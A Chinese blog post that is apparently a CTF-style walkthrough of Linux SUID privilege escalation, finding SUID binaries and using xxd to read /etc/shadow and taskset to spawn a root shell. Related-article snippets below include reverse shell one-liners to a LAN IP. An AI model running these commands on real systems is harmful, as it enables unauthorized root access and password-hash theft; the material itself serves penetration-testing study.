Linux suid 提权

已于 2023-09-08 16:15:47 修改
阅读量205 收藏
点赞数
文章标签: linux 运维 服务器
于 2023-09-07 19:38:20 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/m0_55628907/article/details/132744356
版权

SUID查询网站:https://gtfobins.github.io/

原理参考:http://www.hackdig.com/05/hack-351745.htm

suid可以让文件调用者暂时获得文件拥有者的权限,suid提权的思路让普通用户运行root用户所拥有的suid文件,从而达到提权的目的。

chmod u+s filename   设置SUID位

chmod u-s filename   去掉SUID设置

1.查询设置了SUID权限的可执行文件

查看机器上具有SUID权限的命令,任意一个即可

find / -user root -perm -4000 -print 2>/dev/null

find / -perm -u=s -type f 2>/dev/null

find / -user root -perm -4000 -exec ls -ldb {} ;

-user 指定文件拥有者

-perm 文件权限

-exec 执行系统命令

找到xxd 和 taskset

xxd 只可以使用 susan 用户

taskset 可以使用 susan 和 bob 用户

itservices组具有执行权限,通过/etc/group发现susan用户属于itservices用户组,利用4.隐藏文件发现的密码登录susan用户,进行提权

xxd访问/etc/shadow

xxd "/etc/shadow" |xxd -r

taskset执行bash

#执行/bin/bash
taskset 1 /bin/bash -p

操作系统升(十九)之Linux-SUID
把自己活成一道光,因为你不知道,谁会借着你的光,走出了黑暗。请保持心中的善良,因为你不知道,谁会借着你的善良,走出了绝望。请保持你心中的信仰,因为你不知道,谁会借着你的信仰,走出了迷茫。请相信自己的力量,因为你不知道,谁会因为相信你,开始相信了自己....
02-28 2246
SUID是一种特殊限,设置了suid的程序文件,在用户执行该程序时,用户的限是该程序文件属主的限,例如程序文件的属主是root,那么执行该程序的用户就将暂时获得root账户的限。sgid与suid类似,只是执行程序时获得的是文件属组的限。passwd这个命令程序的限设置,它就是设置了suid限的只有可以执行的二进制程序文件才能设定SUID限,非二进制文件设置SUID限没任何意义.命令执行者要对该程序文件拥有执行(x)限.命令执行者在执行该程序时获得该程序文件属主的身份.
Linux-suid
liver100day的博客
11-16 1660
ww
Linux SUID
最新发布
zmx999999的博客
03-23 485
GTFOBins 是一个专注于 Unix/Linux 系统(Privilege Escalation)和限绕过(Bypass) 的威开源项目,它收集了大量常见系统程序(如 find、vim、nmap 等)的利用方法,帮助安全研究人员和 CTF 选手快速识别和利用配置不当的程序获取更高限。
升-Linux-suid-脏牛内核
告白的博客
09-12 1347
0x00 简介 Linux相对于windows来说方法比较单一,主要方式为suid,内核,环境变量,计划任务,第三方服务,今天来记载一下关于suid以及内核脏牛,以及对目标linux信息收集的判断,以及漏洞探针。 0x01 Linux信息收集,漏洞探针 在获取到Linux主机的普通shell限后,我们可以手动收集目标主机的相关信息,但是手工使用起来效率不高,这里推荐两款信息收集与漏洞探针的自动化脚本, 信息收集:LinEnum.sh 漏洞探针:linux-explo
Linux被曝出SUDO漏洞,幸好影响不大
NOSEC2019的博客
10-15 2453
近期,有安全人员发现了Linux sudo命令中的一个安全漏洞,可让普通用户以root限执行命令。但值得庆幸的是,这个漏洞只能在非标准配置的Linux下生效,大多数Linux服务器不受影响。 在我们开始讨论这个漏洞前,有一些关于sudo命令的工作原理以及相关设置是需要去了解的。 当在Linux操作系统上执行命令时,只有得到许可或者知道root密码,普通用户才可以使用sudo(super use...
二进制网站(包含windows与LInux
weixin_42478365的博客
12-03 3512
https://gtfobins.github.io/
linux suid
03-16
SUID是一种特殊的限位,当一个可执行文件被设置了SUID位后,它在执行时就会以文件所有者的限来执行,而不是以执行者的限来...为了防止SUID攻击,管理员应该定期检查系统中的SUID文件,并限制它们的使用限。
suidlinux
weixin_68652890的博客
04-15 1098
suid suid(设置用户的id)是Linux中的一种特殊限,当运行具有suid限的二进制文件的时候,使得调用者暂时获得该文件拥有者的限(比如a文件拥有者是root,且被赋予了s限,当我们用另外一个普通用户调用a文件的时候,调用过程中这个普通用户会获得root限) 除了经常看见的rwx限还有s限 s限,设置使文件在执行阶段具有文件所有者的限,相当于临时拥有文件所有者的身份。 SUID 当执行的文件被赋予了s限,就被称为Set UID,简称为SUID的特殊限。简称为SUID的特殊
Linux-01 SUID
weixin_45626840的博客
01-14 1119
如果有一个root用户设置了SUID限的可执行文件其后不能直接跟一个命令,或者说不能由用户传参去调用另一个可执行文件,但是其本身又调用了系统中的一个可执行文件,我们可以通过替换这个被调用的可执行文件,达到的目的。root用户设置了SUID的可执行文件,其他用户调用时也是以root限运行,如果这些可执行文件本身又可以调用其他可执行文件,或者可以更改系统的一些配置选项,就可以达到的目的。目录(用户定义的unit文件),不过通常测试人员获取的低限账号是不具备这两个目录的写入限的。
20210411web渗透学习之Linux SUID
qq_45290991的博客
04-13 319
Linux下有很多方式,,我记得之前我写了一篇内核:web渗透学习之Linux内核 内核最好用也是最通杀的“倚天剑”。。但是实战中很难使用……因为对方不是傻子都会打补丁……所以需要的是suid。。测试环境为ubutu15.5 SUIDLinux的一种限机制,具有这种限的文件会在其执行时,使调用者暂时获得该文件拥有者的限。如果拥有SUID限,那么就可以利用系统中的二进制文件和工具来进行root。 就相当于说:我在使用这个文件的时候,我有了root限,,所以一般的思路就
【Try to Hack】Linux suid
开心星人的博客
06-20 881
SUID (Set owner User ID up on execution) 是给予文件的一个特殊类型的文件限。在 Linux/Unix中,当一个程序运行的时候, 程序将从登录用户处继承限。SUID被定义为给予一个用户临时的(程序/文件)所有者的限来运行一个程序/文件。用户在执行程序/文件/命令的时候,将获取文件所有者的限以及所有者的UID和GID。如果root给一个程序赋予了SUID限,则普通用户在执行该程序过程中,是root限。suid限仅对二进制程序有效(binary program
Linux利用Suid实验
qq_45813384的博客
02-20 1291
普通用户在执行特殊的Suid命令的时候(如:find、vim、less、more等),命令会自动申请管理员限,并以管理员的限去执行命令,当用户在这种拥有可以再执行命令的命令下(如:vim)执行特殊命令(如:!find 当前目录下的文件 -execbash-i >& /dev/tcp/192.168.0.105/8529 0>&1。bash-i >& /dev/tcp/192.168.0.105/2323 0>&1//反弹shell命令。ln-s-fbash /bin/sh //修改成bash。
网安学途—SUID教程
星虐
11-18 1912
本文介绍了SUID的基本概念、如何设置SUID限,以及常见的具有SUID限的二进制可执行文件(如nmap、vim、find、bash等)。此外,文章详细阐述了如何利用这些文件进行操作,包括使用find、nmap、more、less、bash、vim、awk和cp等命令的具体方法。最后,文章还对比了/bin/bash和/bin/sh的区别,指出Bash功能更强大,而/bin/sh可能是Bash或其他Shell的符号链接。
Vulnhub Escalate(合集)
2201_75955146的博客
02-17 1001
网络文件系统(
SUID
热门推荐
一只web狗
07-01 1万+
SUID介绍
linux-SUID
@小张小张的博客
09-21 1189
linux-SUIDSUID可以让调用者以文件拥有者的身份运行该文件,所以我们利用SUID的思路就是运行root用户所拥有的SUID的文件,那么我们运行该文件的时候就得获得root用户的身份了。 Linux引入了3个文件来管理用户(组), /etc/passwd存放用户信息,/etc/shadow存放用户密码信息,/etc/group存放组信息,然后在文件系统中的每个文件的文件头里面添加了用户和文件之间的关系信息。 已知的可用来linux可行性的文件列表如下: Nmap Vim
Centos中如何查找SUID、SGID、SBIT特殊限文件
jingde528的博客
10-29 3557
在刚刚配置好的linux服务器中查找系统所有文件中拥有suid特殊限的文件,并将其存储在一个文件中,用于以后比对,以便更好的发觉系统中是否有新增的SUID限文件。 find / -perm -4000 -o -perm -2000 >> /tmp/suId.txt -perm匹配限 4000 2000 1000分别表示SUID SGID SBIT 1.普通文件,文件的限一般三位,777最高文件限 -perm -0777搜索的就是最高限的文件rwxrwxrwx -perm +077.
Linux下利用SUID
Ms08067安全实验室
03-16 3194
今天给大家带来的是linux下的技巧。SUIDLinux的一种限机制,具有这种限的文件会在其执行时,使调用者暂时获得该文件拥有者的限。如果拥...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值